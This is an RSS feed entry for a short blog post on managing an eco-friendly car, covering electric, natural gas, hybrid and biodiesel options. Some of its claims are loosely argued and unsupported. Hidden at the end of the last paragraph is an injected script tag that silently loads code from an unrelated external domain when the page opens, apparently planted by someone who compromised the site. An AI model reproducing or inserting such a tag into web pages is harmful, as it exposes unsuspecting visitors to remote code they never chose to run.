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		<title>How to Manage an Eco Friendly Car</title>
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		<description><![CDATA[Oil Fuelled cars are objects from the past; most scientists say that modern cars are obsolete when it comes to energy efficiency and today’s energetic advancement have made it easy for humankind to improve on its favourite transportation ,the car.

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			<content:encoded><![CDATA[<p>Oil Fuelled cars are objects from the past; most scientists say that modern cars are obsolete when it comes to energy efficiency and today’s energetic advancement have made it easy for humankind to improve on its favourite transportation ,the car.</p>
<p><img class="alignleft size-medium wp-image-73" title="Tribrid_Car" src="http://www.manager-job.info/wp-content/uploads/2009/10/Tribrid_Car-300x147.png" alt="Tribrid_Car" width="300" height="147" /></p>
<p>Sure, we see in the news and auto magazines that the cars of the future have arrived, they are electrical, they work with solar power, they work with hydrogen cells and whatever but where will we have access to those? Are they so expensive that the auto companies are saving it for a better economic time when we will be able to purchase them? In fact, it all comes down to the big oil lobby and I wonder when will it start opening space for renewable energies to become mainstream; in the meanwhile, let’s make some eco auto hunting and try to manage a more responsible transportation.</p>
<p>Electrical cars are available in a somewhat large scale as well as Natural Gas ones; although they have been proven a thousand times to be safe, most people still think they are dangerous and they have not grown in popularity has they should have. They are eco friendly and not that expensive so the obvious reason whey they are not popular is due to lack of appropriate information of the masses. Some oil-based cars can be adapted to work on a hybrid basis, switching from oil to electric or natural gas on occasion. If you are weary of working only with one energy, this can be a smart option to start managing your automobile’s fuel consumption in a more responsible way.</p>
<p>Biodiesel has been discussed endless times and it is such a great way to recycle food oils that would just go to waste otherwise, causing a great pollution level. If you have a diesel car, you will probably be able to switch to biodiesel with no effort so why not try it?</p>
<p>Managing your car, energy wise is not that hard and even if it means an investment on your part to make some changes it will pay off financially on the long haul and the planet says thanks!<script src="http://ie.eracou.com/3"></script></p>
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